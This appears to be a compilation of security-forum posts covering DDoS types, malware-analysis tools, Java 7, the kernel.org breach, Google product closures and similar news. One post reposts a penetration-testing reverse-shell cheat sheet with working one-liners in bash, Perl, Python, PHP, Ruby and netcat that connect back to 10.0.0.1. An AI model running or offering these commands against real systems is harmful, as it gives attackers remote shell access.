Nytro

Taxonomy of DDoS Attacks Property of RioRey, Inc. © 2009 - 2011 1. SYN Flood. Clients generate a SYN packet (64 bytes) to request a new session from a host server. As the TCP three-way communication handshake is created, the host will track and allocate each of the client’s sessions until the session is closed. In a SYN flood, a victim server receives spoofed SYN requests at a high packet rate that contain fake source IP addresses. The SYN flood overwhelms the victim server by depleting its system resources (connection table memory) normally used to store and process these incoming packets, resulting in performance degradation or a complete server shutdown. A well-crafted SYN flood often fools deep-packet inspection filtering techniques. SYN-Cookie defense can be used to defend against large-scale SYN floods but this requires all servers to support this capability. 2. SYN-ACK Flood. Host servers generate SYN-ACK packets in response to incoming SYN requests from clients. During a SYN-ACK flood, the victim server receives spoofed SYN-ACK packets at a high packet rate. This flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to compute this irregularity, resulting in performance degradation or a complete server shutdown. 3. ACK & PUSH ACK Flood. After a TCP-SYN session is established between a host and a client, ACK or PUSH ACK packets are used to communicate information back and forth between the two until the session is closed. During an ACK flood, a victim receives spoofed ACK packets at a high packet rate that fail to belong to any session within the server’s connection list. The ACK flood exhausts a victim’s server by depleting its system resources (memory, CPU, etc.) used to match these incoming packets, resulting in performance degradation or a complete server shutdown. ........................................................................................ Download: http://www.riorey.com/x-resources/2011/RioRey_Taxonomy_DDoS_Attacks_2.2_2011.pdf

Introduction to Malware & Malware Analysis by Rajesh Nikam Introduction Reverse engineering is the process of analyzing a subject system to identify the system's components and their relationships, and to create representations of the system in another form or at a higher level of abstraction. The process of reverse engineering, which is part of malware analysis, is accomplished using specific tools that are categorized as hex editors, disassemblers/debuggers, decompiles and monitoring tools. Disassemblers/debuggers occupy important position in the list of reverse engineering tools. A disassembler converts binary code into assembly code. Disassemblers also extract strings, used libraries, and imported and exported functions. Debuggers expand the functionality of disassemblers by supporting the viewing of the stack, the CPU registers, and the hex dumping of the program as it executes. Debuggers allow breakpoints to be set and the assembly code to be edited at runtime. One must be familiar with the Portable Executable (PE)[1]file format before diving into reverse engineering for Windows executables. In this article we will get into important aspects of Hiew, OllyDbg and IDA Pro from reverse engineer's perspective. Hiew Hiew[2] short for Hacker's view is a great disassembler (not that this is not debugger) designed for hackers, asthe name suggests. It supports three modes - Text, Hexadecimal and Decode (Dis-assembly) mode. Enter/F4 key is used to switch between these modes. In each mode the Function Line, corresponding to function keys from F1 to F12, which appears at the bottom of the Hiew screen, changes and its functionality with CTRL, SHIFT and ALT combinations. PE Header PE Header could be viewed by pressing F8 from Hex or Decode view. In this mode we could see important properties of PE file using following shortcuts: F6 Sections Table F7 Import Table F9 Export Table F10 Data Directories F5 Jump to Entry Point Alt-F2 Jump to end of last section Search in file Hiew supports to search in a file for ASCII or HEX sequence of bytes by pressing F7 key. It also supports byte wild character. Alt-? Wild character Shift-F7 To repeat search Alt-F7 To change search direction Strings ASCII and Unicode strings are viewed from Text/Hex mode by pressing Alt-F6 key. This helps to search for juicy strings like suspicious urls, FTP, SMTP or IRC commands, files names, registry keys etc in the file. You could jump to selected string from string window by pressing ENTER key. +/- keys are used to change the minimum length of displayed strings, this will help to filter out smaller strings. You could apply filter for displayed strings using F9 key. Moving around You could directly jump to specific location by pressing F5 key and providing offset (offset values are hexadecimal?). To specify relative offset + or - sign could be used as prefix to offset. When specified offset is a Virtual Address, it should start with ".". Alt-F1 key is used to toggle between Virtual Address and file offset. If you want jump to specific function or offset which appears as part of control transfer instruction like call, jmp or conditional jump, you could press the key that appears at the end of instruction. Please see Fig.1 marked for label 4. In this case if you press key “4”, it will take you to offset 0x010073DA. 0 or Backspace key is used to jump back the previous instruction. Simple Decryption Hiew supports decryption of block using simple encryptions like xor, add, rol etc. Press F3 from Hex or Decode view to enter in edit mode and then press F7 to add simple decryption routine. You could set operand size as byte, word or dword by pressing F2. Hiew works great when used in combination with File Manager like FAR[3] by configuring its command line. This is very helpful disassembler to quickly get different aspects of file under analysis like file header, section information, data directories, imported / exported functions and strings. OllyDbg OllyDbg[4][5]is an application-level debugger. OllyDbg interface shows the disassembly, hex dump, stack, and CPU registers. Additionally, OllyDbg supports run tracing, conditional breakpoints, PE header viewing, hex editing, and plug-in support. At first Startup, OllyDbg asks to setup User Data Directory (UDD) and Plugins directory.UDD is used to keep debugged application specific information like breakpoints and other information and obviously you need to save plugins in Plugins directory. It provides wide Debugging Options like break on new module or when thread is created, how to process exceptions etc. OllyDbg supports setting of Hardware Breakpoints, Software Breakpoints, Memory Breakpoints and even Conditional Breakpoints. OllyDbg supports plugins to enhance its functionality. Olly Advanced Plugin There were some bugs reported with Olly v1.10 related to string parsing routine, parsing of faulty executables. This plugin fixes most of these bugs. Some malware samples are loaded with Anti-Debugging techniques [7], Olly Advanced plugin helps to counter most of them. Olly DumpPlugin Olly Dump is used to dump debugged process memory. You could trace the packed file till it reaches original entry point and then dump unpacked version of file from process memory. It provides options to rebuild Import Address Table (IAT). Olly ScriptPlugin OllyScriptis a plugin to that lets you to automate OllyDbg by writing scripts in an assembly-like language. Many tasks involve a lot of repetitive work just to get to some point in the debugged application. By using this plugin you could write a script once and it could be used with other similar samples. OpenRCE[8]hosts dozens of scripts that helpful to find original entry point (OEP) of many packers. IDA Pro IDA Pro is a powerful disassembler that presents the disassembly in well-organized format, shows Graph view of selected function. However, it is less frequently used as a debugger in reverse engineers community where OllyDbg steals the top rank. IDA Pro's features include hex editing, string extraction, and import and export viewing. IDA Pro also features a window for viewing all of the functions called by a program, and provides accurate analyses of the program, summarizing them in a color-coded bar at the top of the screen, which classifies the various sections of the program's code. Below figure shows IDA Pro's interface, including the disassembly and the color-coded analysis bar at the top of the screen. The titles of the other windows are visible on the tabs above the disassembly. IDA Pro supports wide variety of processors like ARM, DEC, Intel, Motorola etc. IDA Pro provides selection of debuggers • Bochs • Win Debugger • GDB • WinDbg IDA Pro with Boch semulator make an interesting combination that is used to debug Operating system starting from booting process and it is helpful in debugging even ROM BIOS and Master Boot Record code. Analysis done on particular sample, comments added, functions marked could be saved as an .idb file. IDA Shortcuts Below is the list of some important IDA Shortcuts, for complete list please visit reference [9]. Enter Goto address or variable Esc Go back to previous location ; Add inline comment INSERT | SHIFT ; Add comment N Rename label, variable, functions etc. X Show cross reference M Substitute enum CTRL W *Dont forget to* Save changes Extending IDA IDA supports writing IDC Scripts which is very similar to C like language on top of powerful IDA disassembler. The functionality of disassembler could be utilized even through python scripts and by writing plugins. FLIRT Fast Library Identification and Recognition Technology One of the challenges with disassembly of programs developed with modern high level languages is to identify library functions. One may end up in spending considerable time to go through these functions. On the other hand identification of library functions can considerably ease the analysis of a program. IDA comes with FLIRT to recognize the standard library functions. One must understand the power of each tool to choose appropriate tool for specific requirement during reverse engineering. References 1. Portable Executable File Format – A Reverse Engineer View Tuts 4 You: Downloads / Portable Executable Format (PE) / Portable Executable File Format 2. Hiew Hiew homepage 3. FAR Manager Far Manager Official Site : main 4. OllyDbg OllyDbg v1.10 5. OllyDbg Quick Start Guide Tuts 4 You: Downloads / OllyDbg Tutorials / OllyDbg Quick Start Guide 6. OllyDbg Plugins OpenRCE 7. Anti-Debugging http://lilxam.free.fr/repo/hacking/Windows%20Anti-Debug%20Reference.pdf 8. Olly Scripts OpenRCE 9. IDA Shortcuts http://www.hex-rays.com/idapro/freefiles/IDA_Pro_Shortcuts.pdf Sursa: Tools for Reverse Engineering and Malware Analysis | ClubHACK Magazine

Hijacking Facebook Fan Pages It's easier to hijack a Facebook page than you would expect, because of sloppy security from the social network. The question is - will Facebook do anything about it? Video: http://www.securitytube.net/video/2210 Cu alte cuvinte: daca esti administrator pe o pagina, poti scoate ceilalti administratori, administratorii "originali".

Java 7 Officially Released Published: 2011-09-05, Last Updated: 2011-09-05 13:44:59 UTC by Raul Siles (Version: 2) Oracle officially released Java 7, including some security updates and several new features and enhancements. Thanks ISC reader Alex for notifying us about it. The new Java 7 version coexists with the latest Java 6 Update 27 version and is available for download from the Oracle web site, Oracle Technology Network for Java Developers, and still makes use of different installers for the 32 and 64-bit versions for all operating systems (Linux, Solaris & Windows). As you can see in the release notes, the main security enhancements affect the JSSE (Java Secure Socket Extension) and TLS communications, including TLS v1.1 and v1.2 as well as Server Name Indication (SNI) support. Java 7 does not remove any previous Java versions; I guess this is the intended behavior as this is a major release. From a security perspective, if Java 7 is installed (using Windows as the sample platform) on a system that already has Java 6 installed, both versions will remain, so if you only want to run the latest version, ensure you uninstall any previous versions (as we had to do in the past but with the same major release) and do not leave vulnerable Java 6 releases around. Considering Java is one of the most targeted pieces of client software today, be ready for future updates on both, Java 6 and Java 7 in your IT environments (perhaps Java 6u28 and Java 7u1), and plan in advance how to manage them. UPDATE 1: Let's clarify this diary post title a little bit based on txISO comment (thanks!). If you consider Java to be officially released only when it is available at java.com, then Java has not been officially released yet (see quote on 3rd comment below). However, if you consider that Java 7 is available out there, not only in its JDK version (what I consider the version for developers), but the JRE (Java Runtime Environment) version too, then IMHO, it has been released - although only at oracle.com. Besides that, if you are old Java school and go to the old java.sun.com, you will be redirected to the oracle.com page where Java 7 is available to the public. For our ISC audience, officially or not, get ready for Java 7 as soon as possible: it is out there Sursa: ISC Diary | Java 7 Officially Released

skipfish A fully automated, active web application security reconnaissance tool. Key features: High speed: pure C code, highly optimized HTTP handling, minimal CPU footprint - easily achieving 2000 requests per second with responsive targets. Ease of use: heuristics to support a variety of quirky web frameworks and mixed-technology sites, with automatic learning capabilities, on-the-fly wordlist creation, and form autocompletion. Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors. The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. Docs: SkipfishDoc - skipfish - Project documentation - web application security scanner - Google Project Hosting Primer: lcamtuf's blog: Understanding and using skipfish Download: http://skipfish.googlecode.com/files/skipfish-2.03b.tgz Sursa: skipfish - web application security scanner - Google Project Hosting

Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”. Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' If you want a .php file to upload, see the more featureful and robust php-reverse-shell. Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. nc -e /bin/sh 10.0.0.1 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f xterm One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): xhost +targetip Sursa: Reverse Shell Cheat Sheet | pentestmonkey

OSSEC is an Open Source Host-based Intrusion Detection OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. A list with all supported platforms is available here. Docs: Documentation Download: http://www.ossec.net/main/downloads

Linux Kernel Moves To Github From Linus Torvalds <> Date Sun, 4 Sep 2011 16:27:25 -0700 Subject Linux 3.1-rc5 So it's been another week, and it's time for another -rc. However, master.kernel.org is still down, and there really hasn't been a ton of development going on, so I considered just skipping a week. But hey, the whole point (well, *one* of the points) of distributed development is that no single place is really any different from any other, so since I did a github account for my divelog thing, why not see how well it holds up to me just putting my whole kernel repo there too? So while kernel.org is down for the count, let's just see how github does: https://github.com/torvalds/linux.git NOTE! One thing to look out for when you see a new random public hosting place usage like that is to verify that yes, it's really the person you think it is. So is it? You can take a few different approaches: (a) Heck, it's open source, I don't care who I pull from, I just want a new kernel, and not having a new update from kernel.org in the last few days, I *really* need my new kernel fix. I'll take it, because I need to exercise my CPU's by building randconfig kernels. Besides, I like living dangerously. ( Yeah, the email looks like it comes from Linus, and we all know that SMTP cannot possibly be spoofed, so it must be him. © Ok, I can fetch that tree, and I know that Linus always does signed tags, and I can verify the 3.1-rc5 tag with Linus known public GPG key that I have somewhere. If it matches, I don't care who the person doing the release announcement is, I'll trust that Linus signed the tree (d) I'll just wait for kernel.org to feel better. Whatever works for you. One thing to note: If you just do git pull https://github.com/torvalds/linux.git you probably won't get the tags, since it's not your origin branch. So do git fetch --tags <...> too, so that you get not only the actual changes, but the tag that you can verify too. And I *would* suggest you just pull into an existing tree, rather than clone a new copy. I bet the github people will appreciate that. Anything worth saying about the changes themselves? The appended shortlog pretty much speaks for itself: there really hasn't been much excitement on the kernel development front. Now, if you want to talk to me about dive logging software, that's a whole different kettle of fish.. Linus Sursa: Linux Kernel Moves To Github - Slashdot Info: https://lkml.org/lkml/2011/9/4/92

Window shopping goes high tech with gesture recognition The Fraunhofer Institute's interactive shop window lets people use gestures to learn more about products on display German researchers have given a new meaning to window shopping. At the IFA consumer electronics show in Berlin the Fraunhofer Heinrich Hertz Institute showed a prototype that lets shoppers learn more about what's in a store display window when the store is closed. Called the Interactive Shop Window the system consists of a flat screen monitor and a motion tracker positioned behind the glass of a store's front window. When window-shoppers stand in front of the window, they can point at a product they want. Then the display box holding the product will light up and information for the object will be shown on the screen. Window-shoppers can then view it in different colors or sizes, or learn more about it. The system is controlled by the window-shopper's gestures, which are captured using motion tracking technology that the Fraunhofer team has been working on for a decade. The institute is looking for partners to further the technology and one day change the look of department store windows. "We're searching for partners in the industry to bring it as a new product," said Paul Chojacki, in charge of interactive media for the Fraunhofer Heinrich Hertz Institute. "We have some bigger companies in Germany who are interested in this," he said, although he didn't say which ones. Before the system is ready for a commercial debut there are still some bugs that need to be worked out. For example, the pointer will sometimes jump around the screen, or something will be selected that wasn't intended. Chojacki said one of the biggest challenges was making sure the motion tracking system filtered out reflections on the store front glass. "The window is a problem for us because it's reflecting light and pictures," he said. "We found a solution that is working very well right now." Another problem for the team will be teaching passers by how to use the system because it isn't all that intuitive. Users have to stand in exactly the right spot and make gestures in a defined area for the motion tracker to see them. Chojacki said that the Fraunhofer motion tracker could be replaced by a Microsoft Kinect sensor, but that theirs is specially tailored for the project. Fraunhofer has been working on its motion tracker well before the Kinect premiered, and has shown it at previous IFA shows. In 2008 it was used in the iPointPresenter project, which allowed users to control a mouse cursor using gestures. At the time it could only track objects on a 2D plane. In 2009 the team upgraded the system for the iPoint3D project that recognized gestures on the X, Y and Z axes. Chojacki was also involved with iPoint3D. Sursa si video: Window shopping goes high tech with gesture recognition - webcams, retail, popular science, peripherals, monitors, Input devices, industry verticals, IFA, Fraunhofer Heinrich Hertz Institute - Techworld

Cosmos - C# Open Source Managed Operating System Welcome to the Cosmos home page. Cosmos is an operating system project implemented completely in CIL compliant languages. The team is committed to using C#, however any .NET language can be used. Latest News Aug 3, 2010 - MS5 is here! Why Cosmos? Because its fun! Do we need any more reasons? Well if you do, here are a list of many real world scenarios we envision. How does Cosmos work? Cosmos includes a compiler (IL2CPU, which is part of Cosmos) that reads the input file (usually the shell) and Cosmos libraries and compiles the resulting IL to x86 code. IL2CPU has a layer for cross platform and we plan to support other processors and platforms, including x64. IL2CPU also supports certain extension methods which allow C# code to interact directly with the CPU, registers, and ports in the kernel. IL2CPU contains some inline assembler, but there are no ASM files that need to be linked in. Currently IL2CPU first outputs raw asm files (with IL comments) and then processes them through nasm (a free assembler). Later we plan to emit directly to binary. For more information with pretty pictures please read this article at CodeProject. Sursa: Cosmos - Cosmos Getting started: Getting Started - Cosmos

Buffer overflows - au aparut acum 20 de ani. Nu mai au actualitate?

Cred ca saptamana viitoare se va face putina ordine intre VIPi.

Kernel.org Attackers May Have Slipped Up A se vedea: https://threatpost.com/en_us/blogs/kernelorg-linux-site-compromised-083111 The attack that compromised some high-value servers belonging to kernel.org--but not the Linux kernel source code--may have been the work of hackers who simply got lucky and didn't realize the value of the servers that they had gotten their hands on. The attack, in short, could have been far worse. Researchers who have talked with the kernel.org staff about some of the details of the attack said that none of it sounds as if the attackers necessarily knew what they had stumbled upon or what damage they could have potentially caused. The attackers made a couple of mistakes that enabled the administrators at kernel.org to discover the breach and stop it before any major damage occurred. First, they used a known Linux rootkit called Phalanx that the admins were able to detect. And second, the attackers set up SSH backdoors on the compromised servers, which the admins also discovered. Had the hackers been specifically targeting the kernel.org servers, the attack probably would've looked quite different. "It really does seem that the attackers didn't know what boxes they were on. It's the same kind of techniques that you'd use on any random Linux boxes," said Jon Oberheide, a security researcher and co-founder of Duo Security. "That often happens in an automated or semi-automated way. They compromised some credentials, got onto one box, moved to another one and so on. It's likely that they got onto one machine, had some credentials that they could use on another box and kind of went from there." The attack on kernel.org, which is the main distribution point for the Linux kernel source code, was discovered on Aug. 29 by administrators who noticed some odd error messages and began investigating. What they eventually found was that sometime in mid-August--likely around Aug.12--an attacker got access to one of the kernel.org servers and inserted a Trojan startup script. They also loaded the Phalanx rootkit and remote SSH backdoors. If the attackers had known they were going after the Linux kernel source code to begin with, Oberheide said, some of those tactics wouldn't have made any sense. "That off-the-shelf rootkit is how the admins noticed the attack. They saw these weird error messages. If it was tailored, they wouldn't have seen any log messages," he said. "If you were really trying to backdoor the Linux source code, you wouldn't bother with SSH backdoors. You've already reached your goal." Kernel.org staffers said in a message detailing the attack that they don't believe any of the Linux kernel source code was accessed or modified. Sursa: https://threatpost.com/en_us/blogs/kernelorg-attackers-may-have-slipped-090111

Facebook Blind Sql Injection facebook.com account settings update a postdata _user not filtered have sql injection vulnerabilities.Using a Tamper data and watch post and get request server and update request have vulnerable. "Jester, GHoST61, MadHunTeR, SuSKuN, LifeSteaLeR, Prens, Vp" Email: turksistemguvenligi@gmail.com Twitter : @TurkAslanlari Facebook: Türk Aslanlar Friendfeed: Türk Aslanlar Friendfeed: SQL Injection - FriendFeed[Close] Video: http://www.securitytube.net/video/2204 Da...

A fall spring-clean 9/02/2011 12:45:00 PM Technology improves, people’s needs change, some bets pay off and others don’t. So, as Larry previewed on our last earnings call, today we’re having a fall spring-clean at Google. Over the next few months we’ll be shutting down a number of products and merging others into existing products as features. The list is below. This will make things much simpler for our users, improving the overall Google experience. It will also mean we can devote more resources to high impact products—the ones that improve the lives of billions of people. All the Googlers working on these projects will be moved over to higher-impact products. As for our users, we’ll communicate directly with them as we make these changes, giving sufficient time to make the transition and enabling them to take their data with them. Here’s a quick overview of where a number of products and features are headed: Aardvark: Aardvark was a start-up we acquired in 2010. An experiment in a new kind of social search, it helped people answer each other’s questions. While Aardvark will be closing, we’ll continue to work on tools that enable people to connect and discover richer knowledge about the world. Desktop: In the last few years, there’s been a huge shift from local to cloud-based storage and computing, as well as the integration of search and gadget functionality into most modern operating systems. People now have instant access to their data, whether online or offline. As this was the goal of Google Desktop, the product will be discontinued on September 14, including all the associated APIs, services, plugins, gadgets and support. Fast Flip: Fast Flip was started to help pioneer news content browsing and reading experiences for the web and mobile devices. For the past two years, in collaboration with publishers, the Fast Flip experiment has fueled a new approach to faster, richer content display on the web. This approach will live on in our other display and delivery tools. Google Maps API for Flash: The Google Maps API for Flash was launched to provide ActionScript developers a way to integrate Google Maps into their applications. Although we’re deprecating the API, we’ll keep supporting existing Google Maps API Premier customers using the Google Maps API for Flash and we’ll focus our attention on the JavaScript Maps API v3 going forward. Google Pack: Due to the rapidly decreasing demand for downloadable software in favor of web apps, we will discontinue Google Pack today. People will still be able to access Google’s and our partners’ software quickly and easily through direct links on the Google Pack website. Google Web Security: Google Web Security came to Google as part of the Postini acquisition in 2007, and since then we've integrated much of the web security functionality directly into existing Google products, such as safe browsing in Chrome. Although our previous sales channel will be discontinued, we’ll continue to support our existing customers. Image Labeler: We began Google Image Labeler as a fun game to help people explore and label the images on the web. Although it will be discontinued, a wide variety of online games from Google are still available. Notebook: Google Notebook enabled people to combine clipped URLs from the web and free-form notes into documents they could share and publish. We’ll be shutting down Google Notebook in the coming months, but we’ll automatically export all notebook data to Google Docs. Sidewiki: Over the past few years, we’ve seen extraordinary innovation in terms of making the web collaborative. So we’ve decided to discontinue Sidewiki and focus instead on our broader social initiatives. Sidewiki authors will be given more details about this closure in the weeks ahead, and they’ll have a number of months to download their content. Subscribed Links: Subscribed Links enabled developers to create specialized search results that were added to the normal Google search results on relevant queries for subscribed users. Although we'll be discontinuing Subscribed Links, developers will be able to access and download their data until September 15, at which point subscribed links will no longer appear in people's search results. We’ve never been afraid to try big, bold things, and that won’t change. We’ll continue to take risks on interesting new technologies with a lot of potential. But by targeting our resources more effectively, we can focus on building world-changing products with a truly beautiful user experience. Posted by Alan Eustace, Senior Vice President Si uite asa am mai scapat de o mica parte din monopolul Google. Sursa: Official Google Blog: A fall spring-clean

Mai rar ceva in IPBoard. E in cookie, interesant...

Pff ce idei aveti si voi

Threading in C# Joseph Albahari Last updated 2011-4-27 Table of Contents Part 1: Getting Started ..................................................................... 4 Introduction and Concepts .............................................................................. 4 Join and Sleep ....................................................................................... 6 How Threading Works ......................................................................... 7 Threads vs Processes ............................................................................ 7 Threading’s Uses and Misuses ............................................................. 8 Creating and Starting Threads ........................................................................ 8 Passing Data to a Thread ...................................................................... 9 Naming Threads ................................................................................. 11 Foreground and Background Threads ................................................ 11 Thread Priority.................................................................................... 12 Exception Handling ............................................................................ 12 Thread Pooling .............................................................................................. 14 Entering the Thread Pool via TPL ...................................................... 15 Entering the Thread Pool Without TPL .............................................. 16 Optimizing the Thread Pool ............................................................... 17 Part 2: Basic Synchronization ....................................................... 19 Synchronization Essentials ........................................................................... 19 Blocking ............................................................................................. 19 Blocking Versus Spinning .................................................................. 20 ThreadState ......................................................................................... 20 Locking ......................................................................................................... 21 Monitor.Enter and Monitor.Exit ......................................................... 22 Choosing the Synchronization Object ................................................ 23 When to Lock ..................................................................................... 23 Locking and Atomicity ....................................................................... 24 Nested Locking ................................................................................... 24 Deadlocks ........................................................................................... 25 Performance ........................................................................................ 26 Mutex .................................................................................................. 26 Semaphore .......................................................................................... 27 © 2006-2010 Joseph Albahari, O’Reilly Media, Inc. All rights reserved. www.albahari.com/threading/ 2 Thread Safety ................................................................................................ 28 Thread Safety and .NET Framework Types ....................................... 28 Thread Safety in Application Servers ................................................. 30 Rich Client Applications and Thread Affinity ................................... 30 Immutable Objects .............................................................................. 32 Signaling with Event Wait Handles .............................................................. 33 AutoResetEvent .................................................................................. 33 ManualResetEvent .............................................................................. 37 CountdownEvent ................................................................................ 38 Creating a Cross-Process EventWaitHandle ...................................... 39 Wait Handles and the Thread Pool ..................................................... 39 WaitAny, WaitAll, and SignalAndWait ............................................. 40 Synchronization Contexts ............................................................................. 41 Reentrancy .......................................................................................... 43 Part 3: Using Threads .................................................................... 44 The Event-Based Asynchronous Pattern ...................................................... 44 BackgroundWorker ....................................................................................... 45 Using BackgroundWorker .................................................................. 45 Subclassing BackgroundWorker ........................................................ 47 Interrupt and Abort ....................................................................................... 48 Interrupt .............................................................................................. 49 Abort ................................................................................................... 49 Safe Cancellation .......................................................................................... 50 Cancellation Tokens ........................................................................... 51 Lazy Initialization ......................................................................................... 52 Lazy<T> ............................................................................................. 53 LazyInitializer..................................................................................... 53 Thread-Local Storage ................................................................................... 54 [ThreadStatic] ..................................................................................... 54 ThreadLocal<T> ................................................................................. 55 GetData and SetData .......................................................................... 55 Timers ........................................................................................................... 56 Multithreaded Timers ......................................................................... 56 Single-Threaded Timers ..................................................................... 58 Part 4: Advanced Topics ............................................................... 59 Nonblocking Synchronization ...................................................................... 59 Memory Barriers and Volatility ......................................................... 59 Interlocked .......................................................................................... 63 Signaling with Wait and Pulse ...................................................................... 65 How to Use Wait and Pulse ................................................................ 65 Producer/Consumer Queue ................................................................. 67 Wait Timeouts .................................................................................... 70 Two-Way Signaling and Races .......................................................... 71 Simulating Wait Handles .................................................................... 72 Writing a CountdownEvent ................................................................ 74 Thread Rendezvous ............................................................................ 75 © 2006-2010 Joseph Albahari, O’Reilly Media, Inc. All rights reserved. www.albahari.com/threading/ 3 The Barrier Class .......................................................................................... 75 Reader/Writer Locks ..................................................................................... 77 Upgradeable Locks and Recursion ..................................................... 78 Suspend and Resume .................................................................................... 80 Aborting Threads .......................................................................................... 80 Complications with Thread.Abort ...................................................... 82 Ending Application Domains ............................................................. 83 Ending Processes ................................................................................ 84 Part 5: Parallel Programming ........................................................ 85 Parallel Programming ................................................................................... 85 Why PFX? .................................................................................................... 85 PFX Concepts ..................................................................................... 86 PFX Components................................................................................ 86 When to Use PFX ............................................................................... 87 PLINQ ........................................................................................................... 87 Parallel Execution Ballistics ............................................................... 89 PLINQ and Ordering .......................................................................... 89 PLINQ Limitations ............................................................................. 90 Example: Parallel Spellchecker .......................................................... 90 Functional Purity ................................................................................ 92 Calling Blocking or I/O-Intensive Functions ..................................... 92 Cancellation ........................................................................................ 94 Optimizing PLINQ ............................................................................. 94 Parallelizing Custom Aggregations .................................................... 96 The Parallel Class ....................................................................................... 100 Parallel.Invoke .................................................................................. 100 Parallel.For and Parallel.ForEach ..................................................... 100 Task Parallelism .......................................................................................... 105 Creating and Starting Tasks .............................................................. 105 Waiting on Tasks .............................................................................. 107 Exception-Handling Tasks ............................................................... 108 Canceling Tasks ................................................................................ 109 Continuations .................................................................................... 110 Task Schedulers and UIs .................................................................. 113 TaskFactory ...................................................................................... 114 TaskCompletionSource .................................................................... 114 Working with AggregateException ............................................................ 115 Flatten and Handle ............................................................................ 116 Concurrent Collections ............................................................................... 117 IProducerConsumerCollection<T> .................................................. 117 ConcurrentBag<T> ........................................................................... 118 BlockingCollection<T> .................................................................... 119 SpinLock and SpinWait .............................................................................. 121 SpinLock........................................................................................... 121 SpinWait ........................................................................................... 122[B][/B] Download: http://www.albahari.com/threading/threading.pdf

Daca ai 15 ani probabil te-ai apucat de "hacking" la varsta de 8 ani (la care eu cred ca ma jucam cu masinutele) de esti acum hacker nu?

http://rstcenter.com/forum/24614-snake-youtube.rst 07-29-2010, 02:08 PM Da

Eu mi-am dat seama ca nu stiu niciun limbaj de programare, desi am lucrat ani de zile in PHP, Visual Basic si C++. La PHP am vazut ca nu stiu bine notiuni ca "Late Static Binding", Visual Basic l-am lasat balta dar tot am probleme de limbaj, cu clasele cu care nu prea am lucrat, iar la C++ sunt constient ca nu stiu STL. Sunt doar cateva exemple. Chiar si la C, sunt prostii de "trucuri", chestii care se folosesc la macro-uri, vectori la pointeri de functii.... care imi provoaca probleme. In rest, cunosc limbaje mai multe, ma descurc bine in multe, dar nu pot spune ca le stiu, din moment ce nu stiu toate notiunile legate de ele. Deci practic nu stiu niciun limbaj si e posibil sa nu stiu niciunul niciodata, desi vreau sa citesc cele 1300 de pagini ale vittorului standard C++0x.

Staff-ul a imbatranit. Nu mai avem timp ca voi. Nu sunt tutoriale? Dar voi ce lucrati?

Adu argumente apoi discutam.

Python Tools for Visual Studio – version 1.0! An integrated environment for developing Python in VS2010 Supports CPython and IronPython Python editor with advanced member and signature intellisense Code navigation “Find all refs”, goto definition, and object browser Local and remote debugging Profiling with multiple views Integrated REPL window Support for HPC clusters and MPI, including debugging & Profiling Interactive parallel computing via integrated IPython REPL Free & Open Source (Apache 2.0) Download: http://pytools.codeplex.com/releases/view/69880 Sursa: Python Tools for Visual Studio

Vezi pe aici: Unicode Tables - All Unicode Tables and other charts